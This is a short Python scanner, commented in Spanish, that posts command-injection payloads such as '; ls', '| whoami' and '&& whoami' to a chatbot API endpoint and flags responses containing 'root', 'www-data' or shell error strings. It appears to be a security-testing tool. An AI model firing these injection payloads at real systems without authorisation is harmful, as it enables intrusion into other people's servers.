import requests
import re
def test_os_command_injection(base_url, chat_endpoint):
# Diferentes tipos de payloads para inyección de comandos
payloads = [
"; ls",
"| ls",
"& ls",
"&& ls",
"; whoami",
"| whoami",
"& whoami",
"&& whoami"
]
vulnerable = False
for payload in payloads:
# Enviar el payload al endpoint del chatbot
response = requests.post(base_url + chat_endpoint, data={'message': payload})
content = response.content.decode('utf-8')
# Buscar indicios de una inyección de comandos exitosa
if re.search(r"(root|www-data|command not found|File not found|Error|No such file or directory)", content, re.IGNORECASE):
print(f"Potentially vulnerable to OS Command Injection: {payload}")
vulnerable = True
if not vulnerable:
print("No potential OS Command Injection vulnerabilities detected.")
# Example usage
# base_url = "http://example.com"
# chat_endpoint = "/api/chat"
# test_os_command_injection(base_url, chat_endpoint)